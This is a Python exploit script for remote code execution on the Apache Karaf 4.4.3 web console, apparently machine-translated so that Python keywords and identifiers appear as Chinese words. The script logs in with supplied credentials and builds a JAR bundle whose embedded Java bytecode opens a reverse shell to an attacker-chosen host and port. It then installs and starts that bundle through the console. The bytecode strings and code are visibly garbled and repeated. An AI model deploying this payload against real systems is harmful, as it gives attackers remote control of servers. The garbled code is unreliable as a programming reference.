#!/usr/bin/python
#利用标题: [Karaf V4.4.3控制台RCE]
#日期: [2023-08-07]
#利用作者: [Andrzej Olchawa,Milenko Starcik,
#Visionspace Technologies GmbH]
#利用Repository:
#[https://github.com/visionspacetec/offsec-karaf-exploits.git]
#供应商homepage: [https://karaf.apache.org]
#软件link: [https://karaf.apache.org/download.html]
#版本: [4.4.3]
#测试在: [Linux Kali 6.3.0-Kali1-Amd64]
#许可: [MIT]
#
#USAGE:
#python exploit.py----
#
#示例:
#python exploit.py- -rhost=192.168.0.133 -rport=1337 \
# - lhost=192.168.0.100 -lport=4444 \
#-Creds=KARAF:KARAF
'''
该工具将使您从系统打开反向外壳
那是在运行karaf console',
'''
导入argparse
导入基础64
导入IO
导入
导入Zipfile
导入请求
#subtest.mf文件的内容。
subest_content=\
'Bundle-name: RevShell \ n'\
'Bundle-Description:捆绑包打开反向外壳连接。\ n'\
'bundle-symbolicName: com.visionspace.osgi.revshell.activator \ n'\
'Bundle-vendor: visionspace \ n'\
'Bundle-version: 1.0.0 \ n'\
'import-package: org.osgi.framework \ n'\
'Bundle-Activator: com.visionspace.osgi.revshell.activator'
#activator.class字节码模板。
activator_class_bytecode_template=\
B'\ XCA \ XFE \ XBA \ XBE \ X00 \ X00 \ X00 \ X00 \ X37 \ X00 \ X00 \ X7B'\
B'\ x0a \ x00 \ x22 \ x00 \ x33 \ x08 \ x00 \ x34 \ x34 \ x07 \ x00'\ x00'\ x00'\
B'\ x35 \ x07 \ x00 \ x36 \ x0a \ x00 \ x03 \ x00 \ x00 \ x37 \ x37 \ x0a'\
B'\ x00 \ x03 \ x00 \ x38 \ x0a \ x00 \ x03 \ x00 \ x00 \ x39 \ x07'\
B'\ x00 \ x3a \ x08 \ x00 \ x3b \ x08 \ x00 \ x3c \ x3c \ x0a \ x00'\ x00'\ x00
B'\ x3d \ x00 \ x3e \ x0a \ x00 \ x08 \ x00 \ x3f \ x3f \ x0a \ x00'\ x00'\ x00'\
B'\ x2c \ x00 \ x40 \ x0a \ x00 \ x2c \ x00 \ x41 \ x41 \ x0a \ x00'\ x00'\ x00'\
B'\ x08 \ x00 \ x40 \ x0a \ x00 \ x2c \ x00 \ x42 \ x42 \ x0a \ x00'\ x00'\
B'\ x08 \ x00 \ x42 \ x0a \ x00 \ x08 \ x00 \ x00 \ x43 \ x0a \ x0a \ x00'\ x00'\
B'\ x2d \ x00 \ x44 \ x0a \ x00 \ x2d \ x00 \ x45 \ x45 \ x0a \ x00'\ x00'\ x00'\
B'\ x2e \ x00 \ x46 \ x0a \ x00 \ x2e \ x00 \ x00 \ x47 \ x05 \ x00 \ x00'\ x00'\
B'\ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x32 \ x0a \ x0a \ x00 \ x00 \ x48'\
B'\ x00 \ x49 \ x0a \ x00 \ x2c \ x00 \ x4a \ x4a \ x07 \ x00 \ x00 \ x4b'\
B'\ x0a \ x00 \ x2c \ x00 \ x4c \ x0a \ x00 \ x00 \ x08 \ x00 \ x00 \ x4d'\
B'\ x09 \ x00 \ x4e \ x00 \ x4f \ x08 \ x00 \ x50 \ x50 \ x0a \ x00'\ x00'\ x00'\
B'\ x51 \ x00 \ x52 \ x07 \ x00 \ x53 \ x53 \ x07 \ x00 \ x54 \ x54 \ x07'\ x07'\
B'\ x00 \ x55 \ x01 \ x00 \ x06 \ x3c \ x69 \ x6e \ x6e \ x69 \ x74'\ x69 \ x69 \ x74'\
B'\ x3e \ x01 \ x00 \ x03 \ x28 \ x29 \ x56 \ x56 \ x01 \ x00 \ x00 \ x04'\
B'\ x43 \ x6f \ x64 \ x65 \ x01 \ x00 \ x0f \ x4c \ x4c \ x69 \ x6e'\
B'\ x65 \ x4e \ x75 \ x6d \ x62 \ x65 \ x72 \ x72 \ x54 \ x61 \ x62'\ x61 \ x62'\
B'\ x6c \ x65 \ x01 \ x00 \ x05 \ x73 \ x74 \ x61 \ x61 \ x72 \ x74'\ x74'\
B'\ x01 \ x00 \ x25 \ x28 \ x4c \ x6f \ x72 \ x67 \ x67 \ x2f \ x6f'\ x6f'\
B'\ x73 \ x67 \ x69 \ x2f \ x66 \ x72 \ x61 \ x6d \ x6d \ x65 \ x65 \ x77'\ x77'\
B'\ x6f \ x72 \ x6b \ x2f \ x42 \ x75 \ x6e \ x64 \ x64 \ x6c \ x65'\
B'\ x43 \ x6f \ x6e \ x74 \ x65 \ x78 \ x74 \ x74 \ x3b \ x29 \ x56'\ x56'\
B'\ x01 \ x00 \ x0d \ x53 \ x74 \ x61 \ x63 \ x6b \ x6b \ x4d \ x61'\
B'\ x70 \ x54 \ x61 \ x62 \ x6c \ x65 \ x65 \ x07 \ x00 \ x56 \ x56 \ x07'\ x07'\
B'\ x00 \ x57 \ x07 \ x00 \ x58 \ x58 \ x07 \ x00 \ x59 \ x59 \ x01 \ x00'\ x00'\ x00'\
B'\ x0a \ x45 \ x78 \ x63 \ x65 \ x70 \ x74 \ x74 \ x69 \ x6f \ x6e'\ x6e'\
B'\ x73 \ x01 \ x00 \ x04 \ x73 \ x74 \ x6f \ x70 \ x70 \ x01 \ x00'\ x00'\ x00
B'\ x0a \ x53 \ x6f \ x75 \ x72 \ x63 \ x65 \ x65 \ x46 \ x69 \ x6c'\ x6c'\
B'\ x65 \ x01 \ x00 \ x0e \ x41 \ x63 \ x74 \ x69 \ x76 \ x76 \ x61'\
B'\ x74 \ x6f \ x72 \ x2e \ x6a \ x61 \ x76 \ x61 \ x61 \ x0c \ x00'\ x00'\
B'\ x24 \ x00 \ x25 \ x01 \ x00 \ x02 \ x73 \ x68 \ x68 \ x01 \ x00'\ x00'\ x00
B'\ x18 \ x6a \ x61 \ x76 \ x61 \ x2f \ x6c \ x61 \ x61 \ x61 \ x61 \ x6e \ x67'\
B'\ x2f \ x50 \ x72 \ x6f \ x63 \ x65 \ x73 \ x73 \ x73 \ x42 \ x42 \ x75'\
B'\ x69 \ x6c \ x64 \ x65 \ x72 \ x01 \ x00 \ x00 \ x10 \ x6a \ x61 \ x61'\
B'\ x76 \ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x53 \ x74'\ x74'\
B'\ x72 \ x69 \ x6e \ x67 \ x0c \ x00 \ x24 \ x00 \ x00 \ x5a \ x5a \ x0c'\
B'\ x00 \ x5b \ x00 \ x5c \ x0c \ x00 \ x28 \ x00 \ x00 \ x5d \ x5d \ x01'\
B'\ x00 \ x0f \ x6a \ x61 \ x76 \ x61 \ x2f \ x6e \ x65 \ x65 \ x74'\
B'\ x2f \ x53 \ x6f \ x63 \ x6b \ x65 \ x74 \ x01 \ x00 \ x00 \ x07'\
B'\ x3c \ x4c \ x48 \ x4f \ x53 \ x54 \ x3e \ x01 \ x01 \ x00 \ x07'\ x07'\
B'\ x3c \ x4c \ x50 \ x4f \ x52 \ x54 \ x3e \ x07 \ x00 \ x00 \ x5e'\ x5e'\
B'\ x0c \ x00 \ x5f \ x00 \ x60 \ x0c \ x00 \ x24 \ x24 \ x00 \ x00 \ x61'\
B'\ x0c \ x00 \ x62 \ x00 \ x63 \ x0c \ x00 \ x64 \ x64 \ x00 \ x63'\ x63'\
B'\ x0c \ x00 \ x65 \ x00 \ x66 \ x0c \ x00 \ x67 \ x67 \ x00 \ x00 \ x68'\
B'\ x0c \ x00 \ x69 \ x00 \ x6a \ x0c \ x00 \ x6b \ x6b \ x00 \ x6a'\ x6a'\
B'\ x0c \ x00 \ x6c \ x00 \ x6d \ x0c \ x00 \ x6e \ x6e \ x00 \ x00 \ x25'\
B'\ x07 \ x00 \ x6f \ x0c \ x00 \ x70 \ x00 \ x00 \ x71 \ x0c \ x0c \ x00'\ x00'\ x00
B'\ x72 \ x00 \ x6a \ x01 \ x00 \ x13 \ x6a \ x61 \ x61 \ x76 \ x61'\ x61'\
B'\ x2f \ x6c \ x61 \ x6e \ x67 \ x2f \ x45 \ x78 \ x78 \ x63 \ x65'\
B'\ x70 \ x74 \ x69 \ x6f \ x6e \ x0c \ x00 \ x73 \ x00 \ x00 \ x25'\ x25'\
B'\ x0c \ x00 \ x74 \ x00 \ x25 \ x07 \ x00 \ x00 \ x75 \ x0c \ x00 \ x00'\ x00'\ x00
B'\ x76 \ x00 \ x77 \ x01 \ x00 \ x1d \ x54 \ x54 \ x68 \ x61 \ x61 \ x6e'\ x61
B'\ x6b \ x20 \ x79 \ x6f \ x75 \ x20 \ x66 \ x6f \ x6f \ x72 \ x20'\ x20'\
B'\ x70 \ x77 \ x6e \ x69 \ x6e \ x67 \ x20 \ x77 \ x77 \ x69 \ x74'\
B'\ x68 \ x20 \ x75 \ x73 \ x21 \ x07 \ x00 \ x00 \ x78 \ x0c \ x00'\ x00'\
B'\ x79 \ x00 \ x7a \ x01 \ x00 \ x27 \ x63 \ x6f \ x6f \ x6d \ x6d \ x2f'\
B'\ x76 \ x69 \ x73 \ x69 \ x6f \ x6e \ x73 \ x70 \ x70 \ x61 \ x63'\ x63'\
B'\ x65 \ x2f \ x6f \ x73 \ x67 \ x69 \ x2f \ x72 \ x65 \ x65 \ x76'\ x76'\
B'\ x73 \ x68 \ x65 \ x6c \ x6c \ x2f \ x41 \ x63 \ x63 \ x74 \ x69'\
B'\ x76 \ x61 \ x74 \ x6f \ x72 \ x01 \ x00 \ x00 \ x10 \ x6a \ x61'\ x61'\
B'\ x76 \ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x4f \ x4f \ x62'\ x62'\ x62
B'\ x6a \ x65 \ x63 \ x74 \ x01 \ x00 \ x22 \ x6f \ x6f \ x72 \ x67'\ x67'\
B'\ x2f \ x6f \ x73 \ x67 \ x69 \ x2f \ x66 \ x72 \ x72 \ x61 \ x6d'\ x61
B'\ x65 \ x77 \ x6f \ x72 \ x6b \ x2f \ x42 \ x75 \ x75 \ x6e \ x64'\
B'\ x6c \ x65 \ x41 \ x63 \ x74 \ x69 \ x76 \ x61 \ x61 \ x74 \ x6f'\ x6f'\
B'\ x72 \ x01 \ x00 \ x20 \ x6f \ x72 \ x67 \ x2f \ x6f \ x6f \ x73'\ x73'\
B'\ x67 \ x69 \ x2f \ x66 \ x72 \ x61 \ x6d \ x65 \ x65 \ x77 \ x77 \ x6f'\ x6f'\
B'\ x72 \ x6b \ x2f \ x42 \ x75 \ x6e \ x64 \ x6c \ x6c \ x65 \ x43'\ x43'\
B'\ x6f \ x6e \ x74 \ x65 \ x78 \ x74 \ x01 \ x00 \ x00 \ x11 \ x6a'\ x6a'\
B'\ x61 \ x76 \ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x50'\ x50'\
B'\ x72 \ x6f \ x63 \ x65 \ x73 \ x73 \ x73 \ x01 \ x00 \ x13 \ x13 \ x6a'\
B'\ x61 \ x76 \ x61 \ x2f \ x69 \ x6f \ x2f \ x2f \ x49 \ x6e \ x70'\ x70'\
B'\ x75 \ x74 \ x53 \ x74 \ x72 \ x65 \ x61 \ x61 \ x6d \ x01 \ x00'\ x00'\ x00
B'\ x14 \ x6a \ x61 \ x76 \ x61 \ x2f \ x69 \ x6f \ x6f \ x2f \ x2f \ x4f'\
B'\ x75 \ x74 \ x70 \ x75 \ x74 \ x53 \ x74 \ x72 \ x72 \ x65 \ x61'\ x61'\
B'\ x6d \ x01 \ x00 \ x16 \ x28 \ x5b \ x4c \ x6a \ x6a \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x53 \ x74 \ x72'\ x74 \ x72'\
B'\ x69 \ x6e \ x67 \ x3b \ x29 \ x56 \ x01 \ x00 \ x00 \ x13 \ x72'\
B'\ x65 \ x64 \ x69 \ x72 \ x65 \ x63 \ x74 \ x45 \ x45 \ x72 \ x72'\ x72'\
B'\ x6f \ x72 \ x53 \ x74 \ x72 \ x65 \ x61 \ x61 \ x6d \ x01 \ x00'\ x00'\
B'\ x1d \ x28 \ x5a \ x29 \ x4c \ x6a \ x61 \ x76 \ x76 \ x61 \ x2f'\ x2f'\
B'\ x6c \ x61 \ x6e \ x67 \ x2f \ x50 \ x72 \ x6f \ x6f \ x63 \ x65'\ x63 \ x65'\
B'\ x73 \ x73 \ x42 \ x75 \ x69 \ x6c \ x64 \ x65 \ x65 \ x72 \ x3b'\
B'\ x01 \ x00 \ x15 \ x28 \ x29 \ x4c \ x6a \ x61 \ x61 \ x76 \ x61'\ x61 \ x61'\
B'\ x2f \ x6c \ x61 \ x6e \ x67 \ x2f \ x50 \ x72 \ x72 \ x6f \ x63'\ x63'\
B'\ x65 \ x73 \ x73 \ x3b \ x01 \ x00 \ x11 \ x6a \ x61 \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x49 \ x6e \ x6e \ x74'\ x74'\
B'\ x65 \ x67 \ x65 \ x72 \ x01 \ x00 \ x08 \ x70 \ x70 \ x61 \ x72'\ x72'\
B'\ x73 \ x65 \ x49 \ x6e \ x74 \ x01 \ x00 \ x15 \ x15 \ x28 \ x4c'\ x4c'\ x4c
B'\ x6a \ x61 \ x76 \ x61 \ x2f \ x6c \ x61 \ x61 \ x61 \ x6e \ x67 \ x67 \ x2f'\
B'\ x53 \ x74 \ x72 \ x69 \ x6e \ x67 \ x3b \ x3b \ x29 \ x49 \ x01'\ x01'\
B'\ x00 \ x16 \ x28 \ x4c \ x6a \ x61 \ x76 \ x61 \ x61 \ x2f \ x6c'\ x6c'\ x61
B'\ x61 \ x6e \ x67 \ x2f \ x53 \ x74 \ x72 \ x69 \ x69 \ x6e \ x67'\ x67'\
B'\ x3b \ x49 \ x29 \ x56 \ x01 \ x00 \ x0e \ x67 \ x67 \ x65 \ x74'\
B'\ x49 \ x6e \ x70 \ x75 \ x74 \ x53 \ x74 \ x72 \ x72 \ x65 \ x61'\ x61'\
B'\ x6d \ x01 \ x00 \ x17 \ x28 \ x29 \ x4c \ x6a \ x6a \ x61 \ x76'\
B'\ x61 \ x2f \ x69 \ x6f \ x2f \ x49 \ x6e \ x70 \ x70 \ x75 \ x74'\ x74'\
B'\ x53 \ x74 \ x72 \ x65 \ x61 \ x6d \ x6d \ x3b \ x01 \ x00 \ x00 \ x0e'\ x0e'\
B'\ x67 \ x65 \ x74 \ x45 \ x72 \ x72 \ x6f \ x6f \ x72 \ x53 \ x74'\ x74'\
B'\ x72 \ x65 \ x61 \ x6d \ x01 \ x00 \ x00 \ x0f \ x67 \ x65 \ x65 \ x74'\
B'\ x4f \ x75 \ x74 \ x70 \ x75 \ x74 \ x53 \ x74 \ x74 \ x72 \ x65'\ x65'\
B'\ x61 \ x6d \ x01 \ x00 \ x18 \ x28 \ x29 \ x4c \ x4c \ x6a \ x61'\
B'\ x76 \ x61 \ x2f \ x69 \ x6f \ x2f \ x2f \ x4f \ x75 \ x74 \ x74 \ x70'\ x70'\
B'\ x75 \ x74 \ x53 \ x74 \ x72 \ x65 \ x61 \ x6d \ x6d \ x3b \ x3b \ x01'\ x01'\
B'\ x00 \ x08 \ x69 \ x73 \ x43 \ x6c \ x6f \ x6f \ x73 \ x65 \ x65 \ x64'\
B'\ x01 \ x00 \ x03 \ x28 \ x29 \ x5a \ x01 \ x00 \ x00 \ x09 \ x61'\
B'\ x76 \ x61 \ x69 \ x6c \ x61 \ x62 \ x6c \ x6c \ x65 \ x65 \ x01 \ x00'\ x00'\
B'\ x03 \ x28 \ x29 \ x49 \ x01 \ x00 \ x04 \ x72 \ x72 \ x65 \ x61'\ x65 \ x61'\
B'\ x64 \ x01 \ x00 \ x05 \ x77 \ x72 \ x69 \ x74 \ x74 \ x65 \ x01'\ x01'\
B'\ x00 \ x04 \ x28 \ x49 \ x29 \ x56 \ x01 \ x00 \ x00 \ x05 \ x05 \ x66'\
B'\ x6c \ x75 \ x73 \ x68 \ x01 \ x00 \ x10 \ x6a \ x6a \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x2f \ x54 \ x54 \ x68 \ x72'\ x72'\
B'\ x65 \ x61 \ x64 \ x01 \ x00 \ x05 \ x73 \ x6c \ x6c \ x65 \ x65'\ x65 \ x65'\
B'\ x70 \ x01 \ x00 \ x04 \ x28 \ x4a \ x29 \ x56 \ x56 \ x01 \ x00'\ x00'\ x00
B'\ x09 \ x65 \ x78 \ x69 \ x74 \ x56 \ x61 \ x6c \ x6c \ x75 \ x65'\ x65 \ x65'\
B'\ x01 \ x00 \ x07 \ x64 \ x65 \ x73 \ x74 \ x72 \ x72 \ x6f \ x79'\ x79'\
B'\ x01 \ x00 \ x05 \ x63 \ x6c \ x6f \ x6f \ x73 \ x65 \ x65 \ x01 \ x00'\ x00'\ x00
B'\ x10 \ x6a \ x61 \ x76 \ x61 \ x2f \ x6c \ x6c \ x61 \ x61 \ x61 \ x6e \ x67'\ x67'\
B'\ x2f \ x53 \ x79 \ x73 \ x74 \ x65 \ x6d \ x6d \ x01 \ x00 \ x00 \ x03'\
B'\ x6f \ x75 \ x74 \ x01 \ x00 \ x15 \ x4c \ x4c \ x6a \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x69 \ x6f \ x2f \ x2f \ x50 \ x72 \ x69 \ x6e \ x6e \ x74'\
B'\ x53 \ x74 \ x72 \ x65 \ x61 \ x6d \ x6d \ x3b \ x01 \ x00 \ x00 \ x13'\
B'\ x6a \ x61 \ x76 \ x61 \ x2f \ x69 \ x6f \ x6f \ x2f \ x50 \ x72'\ x72'\
B'\ x69 \ x6e \ x74 \ x53 \ x74 \ x72 \ x65 \ x61 \ x61 \ x6d \ x01'\
B'\ x00 \ x07 \ x70 \ x72 \ x69 \ x6e \ x74 \ x6c \ x6c \ x6e \ x01'\
B'\ x00 \ x15 \ x28 \ x4c \ x6a \ x61 \ x76 \ x61 \ x61 \ x2f \ x6c'\ x6c'\ x61
B'\ x61 \ x6e \ x67 \ x2f \ x53 \ x74 \ x72 \ x69 \ x69 \ x6e \ x67'\ x67'\
B'\ x3b \ x29 \ x56 \ x00 \ x21 \ x00 \ x21 \ x00 \ x00 \ x21 \ x21 \ x00 \ x22 \ x00'\ x00'\ x00
B'\ x01 \ x00 \ x23 \ x00 \ x00 \ x00 \ x00 \ x03 \ x00 \ x01 \ x01 \ x00'\ x00'\ x00
B'\ x24 \ x00 \ x25 \ x00 \ x01 \ x00 \ x26 \ x00 \ x00 \ x00 \ x00 \ x00'\ x00'\
B'\ x1d \ x00 \ x01 \ x00 \ x01 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x05 \ x2a'\ x2a'\
B'\ xb7 \ x00 \ x01 \ xb1 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x27'\ x27'\
B'\ x00 \ x00 \ x00 \ x06 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x0a'\
B'\ x00 \ x01 \ x00 \ x28 \ x00 \ x29 \ x00 \ x00 \ x02 \ x00 \ x00 \ x26'\
B'\ x00 \ x00 \ x01 \ x6e \ x00 \ x00 \ x06 \ x00 \ x0b \ x00 \ x00 \ x00'\ x00'\
B'\ x00 \ xb8 \ x12 \ x02 \ x4d \ xbb \ x00 \ x03 \ x59 \ x59 \ x04'\
B'\ xbd \ x00 \ x04 \ x59 \ x03 \ x2c \ x53 \ xb7 \ xb7 \ x00 \ x00 \ x05'\
B'\ x04 \ xb6 \ x00 \ x06 \ xb6 \ x00 \ x00 \ x07 \ x4e \ xbb \ xbb \ x00'\ x00'\
B'\ x08 \ x59 \ x12 \ x09 \ x12 \ x0a \ xb8 \ x00 \ x00 \ x0b \ xb7'\ xb7'\
B'\ x00 \ x0c \ x3a \ x04 \ x2d \ xb6 \ x00 \ x0d \ x0d \ x3a \ x05'\ x05'\
B'\ x2d \ xb6 \ x00 \ x0e \ x3a \ x06 \ x19 \ x04 \ x04 \ xb6 \ x00'\ x00'\
B'\ x0f \ x3a \ x07 \ x2d \ xb6 \ x00 \ x10 \ x3a \ x3a \ x08 \ x19'\ x19'\
B'\ x04 \ xb6 \ x00 \ x11 \ x3a \ x09 \ x19 \ x19 \ x04 \ xb6 \ x00'\ x00'\ x00'\
B'\ x12 \ x9a \ x00 \ x5f \ x19 \ x05 \ xb6 \ x00 \ x00 \ x13 \ x9e'\ x9e'\
B'\ x00 \ x10 \ x19 \ x09 \ x19 \ x05 \ xb6 \ x00 \ x00 \ x14 \ xb6'\ xb6'\
B'\ x00 \ x15 \ xa7 \ xff \ xee \ x19 \ x06 \ xb6 \ xb6 \ x00 \ x00 \ x13'\
B'\ X9E \ x00 \ x10 \ x19 \ x09 \ x19 \ x06 \ xb6 \ xb6 \ x00 \ x00 \ x14'\
B'\ xb6 \ x00 \ x15 \ xa7 \ xff \ xee \ x19 \ x07 \ xb6 \ xb6 \ x00'\ x00'\
B'\ x13 \ x9e \ x00 \ x10 \ x19 \ x08 \ x19 \ x07 \ xb6 \ xb6 \ x00'\ x00'\
B'\ x14 \ xb6 \ x00 \ x15 \ xa7 \ xff \ xee \ x19 \ x19 \ x09 \ xb6'\
B'\ x00 \ x16 \ x19 \ x08 \ xb6 \ x00 \ x16 \ x14 \ x14 \ x00 \ x00 \ x17'\ x17'\
B'\ xb8 \ x00 \ x19 \ x2d \ xb6 \ x00 \ x1a \ x57 \ x57 \ xa7 \ x00'\ x00'\
B'\ x08 \ x3a \ x0a \ xa7 \ xff \ x9f \ x2d \ xb6 \ xb6 \ x00 \ x1c'\ x1c'\
B'\ x19 \ x04 \ xb6 \ x00 \ x1d \ xb1 \ x00 \ x00 \ x01 \ x00 \ x00 \ xa1'\
B'\ x00 \ xa6 \ x00 \ xa9 \ x00 \ x1b \ x00 \ x02 \ x00 \ x00 \ x27'\ x27'\
B'\ x00 \ x00 \ x00 \ x66 \ x00 \ x19 \ x00 \ x00 \ x00 \ x00 \ x00 \ x0c'\
B'\ x00 \ x03 \ x00 \ x0e \ x00 \ x1a \ x00 \ x00 \ x0f \ x00 \ x00 \ x2a'\ x2a'\
B'\ x00 \ x10 \ x00 \ x30 \ x00 \ x11 \ x00 \ x36 \ x36 \ x00 \ x12'\ x12'\
B'\ x00 \ x3d \ x00 \ x13 \ x00 \ x43 \ x00 \ x14 \ x14 \ x00 \ x4a'\ x4a'\
B'\ x00 \ x15 \ x00 \ x52 \ x00 \ x16 \ x00 \ x5a \ x5a \ x00 \ x17'\ x17'\
B'\ x00 \ x67 \ x00 \ x18 \ x00 \ x6f \ x00 \ x19 \ x19 \ x00 \ x7c'\ x7c'\
B'\ x00 \ x1a \ x00 \ x84 \ x00 \ x1b \ x00 \ x91 \ x91 \ x00 \ x1c'\ x1c'\
B'\ x00 \ x96 \ x00 \ x1d \ x00 \ x9b \ x00 \ x1e \ x1e \ x00 \ xa1'\
B'\ x00 \ x20 \ x00 \ xa6 \ x00 \ x21 \ x00 \ xa9 \ x00 \ x00 \ x22'\ x22'\
B'\ x00 \ xab \ x00 \ x23 \ x00 \ xae \ x00 \ x25 \ x25 \ x00 \ xb2'\
B'\ x00 \ x26 \ x00 \ xb7 \ x00 \ x27 \ x00 \ x00 \ x2a \ x00 \ x00 \ x00 \ x00 \ x00'\ x00'\
B'\ x00 \ x30 \ x00 \ x07 \ xff \ x00 \ x4a \ x00 \ x00 \ x0a \ x07'\
B'\ x00 \ x21 \ x07 \ x00 \ x2b \ x07 \ x00 \ x04 \ x04 \ x07 \ x00'\ x00'\ x00'\
B'\ x2c \ x07 \ x00 \ x08 \ x07 \ x00 \ x2d \ x2d \ x07 \ x00 \ x00 \ x2d'\ x2d'\
B'\ x07 \ x00 \ x2d \ x07 \ x00 \ x2e \ x2e \ x07 \ x00 \ x2e \ x2e \ x07 \ x00 \ x00 \ x2e \ x2e \ x00'\ x00'\
B'\ x00 \ x07 \ x14 \ x14 \ x14 \ x14 \ x14 \ x57 \ x07 \ x00 \ x00 \ x1b \ x1b \ x04'\
B'\ x00 \ x2f \ x00 \ x00 \ x00 \ x00 \ x04 \ x00 \ x01 \ x00 \ x00 \ x1b'\
B'\ x00 \ x01 \ x00 \ x30 \ x00 \ x29 \ x00 \ x02 \ x00 \ x00 \ x26'\ x00 \ x00 \ x26'\
B'\ x00 \ x00 \ x00 \ x25 \ x00 \ x00 \ x02 \ x00 \ x02 \ x00 \ x00 \ x02 \ x00 \ x00 \ x00'\ x00'\ x00
B'\ x00 \ x09 \ xb2 \ x00 \ x1e \ x12 \ x1f \ x1f \ xb6 \ x00 \ x20'\ x20'\
B'\ xb1 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x27 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00'\ x00'\ x00'\
B'\ x0a \ x00 \ x02 \ x00 \ x00 \ x00 \ x00 \ x2a \ x00 \ x00 \ x00 \ x08 \ x00'\ x00'\ x00'\
B'\ x2b \ x00 \ x2f \ x00 \ x00 \ x00 \ x00 \ x04 \ x00 \ x01 \ x01 \ x00'\ x00'\
B'\ x1b \ x00 \ x01 \ x00 \ x31 \ x00 \ x00 \ x00 \ x00 \ x02 \ x00'\ x00'\ x00
B'\ x32'
#要替换的项目在Activator.class的字节码中
#lenlhost=\ x07 \ x3c \ x4c \ x48 \ x4f \ x53 \ x54 \ x3e
activator_class_lhost_tag=b'\ x07 \ x3c \ x4c \ x48 \ x4f \ x4f \ x53 \ x54 \ x54 \ x3e'
#lenlport=\ x07 \ x3c \ x4c \ x50 \ x4f \ x52 \ x54 \ x3e
activator_class_lport_tag=b'\ x07 \ x3c \ x4c \ x50 \ x4f \ x4f \ x52 \ x54 \ x3e'
DEF PARSE():
'''
此函数解析命令行参数。
'''
Parser=argparse.argumentparser(
prog='karaf-console-rce',
description='此工具将使您从'
“正在运行karaf控制台的系统”,
epilog='快乐黑客!)',
)
parser.add_argument(' - rhost',dest='rhost',
help='远程主机',type=str,必需=true)
parser.add_argument(' - rport',dest='rport',
help='远程端口',type=int,必需=true)
parser.add_argument(' - lhost',dest='lhost',
help='本地主机',type=str,必需=true)
parser.add_argument(' - lport',dest='lport',
help='本地端口',type=int,必需=true)
parser.add_argument(' - creds',dest='cords',
help='格式username
assword的凭据',
type=str,必需=true)
parser.add_argument(' - 版本',action='版本',
版本='%(prog)s 0.1.0')
返回parser.parse_args()
def extract_jsessionid(cookie):
'''
此功能从cookie字符串中提取JSessionId。
'''
jsessionId=无
regex=re.findall('jsessionid=([^;]+)',cookie)
如果Len(Regex)0:
jsessionId=正则[0]
返回JSessionId
def Authenticate(target,basic_auth):
'''
此功能连接到URL并检索JSessionId
基于基本授权。
'''
jsessionId=无
标题={
“授权” : BASIC_AUTH
}
响应=requests.get(target,标头=标题,
laster_redirects=false,超时=10)
if(response.status_code==302 and wenspy.headers ['set-cookie']):
jsessionId=extract_jsessionId(response.headers ['set-cookie'])
返回JSessionId
Def Generate_Payload(LHOST,LPORT):
'''
此功能生成有效载荷。
它用“ lhost”和“ lport”参数代替了模板有效载荷。
'''
有效载荷=无
lhost_byte_array=bytearray()
lhost_byte_array.append(Len(lhost))
lhost_byte_array.extend(Map(ord,lhost))
activater_class_bytecodes=activator_class_bytecode_template.replace(
activator_class_lhost_tag,lhost_byte_array)
lport_str=str(lport)
lport_byte_array=bytearray()
lport_byte_array.append(len(lport_str))
lport_byte_array.extend(Map(ord,lport_str))
activater_class_bytecodes=activater_class_bytecodes.replace(
activator_class_lport_tag,lport_byte_array)
jar_bytes=io.bytesio()
用zipfile.zipfile(jar_bytes,'w',zipfile.zip_deflated)为zip_file:
zip_file.writester('com/visionspace/osgi/revshell/activator.class',
Activater_class_bytecodes)
zip_file.writester('meta-inf/subest.mf',subest_content)
有效载荷=jar_bytes.getValue()
退回有效载荷
Def Deploy_payload(target,basic_auth,jsessionId,有效载荷):
'''
此功能连接到KARAF控制台并部署有效载荷。
'''
成功=false
url=f'{target}/捆绑
cookies={
'jSessionId': jsessionId
}
标题={
“授权” : BASIC_AUTH
}
文件={
'Bundlefile':(
'revshell.jar',有效载荷,'application/x-java-archive')
}
数据={
'Action':'安装',
'Bundlestart':'开始',
'Bundlestartlevel': 80
}
响应=requests.post(url,标头=标题,cookies=cookie,
文件=文件,数据=数据,超时=10,
ally_redirects=false)
if stest.status_code==302:
成功=true
返回成功
def generate_basic_auth(Creds):
'''
此函数基于基本的授权字符串
在凭证上。
'''
creds_base64=base64.b64encode(creds.encode())。decode()
basic_auth=f'basic {creds_base64}'
返回basic_auth
def create_target_url(rhost,rport):
'''
此功能创建目标URL。
'''
target_url=f'http://{rhost} : {rport}/system/console'
返回target_url
def main(args):
'''
主要功能。
'''
target=create_target_url(args.rhost,args.rport)
打印('[*]登录.')
basic_auth=generate_basic_auth(args.creds)
jSessionId=authenticate(target,basic_auth)
如果JSessionID:
打印(建立'[+]会话。')
打印('[*]生成有效载荷.')
payload=generate_payload(args.lhost, args.lport)
如果有效:
打印('[*]部署有效载荷.')
如果Deploy_payload(target,basic_auth,jsessionid,有效载荷):
打印('[+]完成。')
其他:
打印('[ - ]无法部署有效载荷!')
其他:
打印('[ - ]无法生成有效载荷!')
其他:
打印('[ - ]登录失败!')
如果name=='__ -Main __':
主(parse())
#利用标题: [Karaf V4.4.3控制台RCE]
#日期: [2023-08-07]
#利用作者: [Andrzej Olchawa,Milenko Starcik,
#Visionspace Technologies GmbH]
#利用Repository:
#[https://github.com/visionspacetec/offsec-karaf-exploits.git]
#供应商homepage: [https://karaf.apache.org]
#软件link: [https://karaf.apache.org/download.html]
#版本: [4.4.3]
#测试在: [Linux Kali 6.3.0-Kali1-Amd64]
#许可: [MIT]
#
#USAGE:
#python exploit.py----
#
#示例:
#python exploit.py- -rhost=192.168.0.133 -rport=1337 \
